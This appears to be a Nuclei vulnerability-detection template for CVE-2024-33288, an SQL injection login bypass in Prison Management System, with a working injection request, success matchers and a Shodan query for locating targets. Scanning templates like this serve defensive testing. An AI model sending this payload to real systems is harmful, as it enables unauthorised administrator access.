id: CVE-2024-33288 info: name: Prison Management System - SQL Injection Authentication Bypass author: Kazgangap severity: high description: | Sql injection vulnerability was found on the login page in Prison Management System reference: - https://en.0day.today/exploit/39610 - https://www.sourcecodester.com/sql/17287/prison-management-system.html metadata: verified: true max-request: 2 shodan-query: title:"Prison Management System" tags: cve,cve2024,cms,sqli http: - raw: - | POST /Admin/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin= - | GET /Admin/index.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word words: - "

Change Password

" - "

Logout

" - "Admin Dashboard | Prison Management system" condition: and - type: status status: - 200 # digest: 4b0a00483046022100859ec311a5b87c8613179df918539075c5fd10a9d17a0273f0970d74ab5ea0e90221008c39c278e0ce4d1b08af7daa3356e7901998adf7c17a2919323d4a935efff082:922c64590222798bb761d5b6d8e72950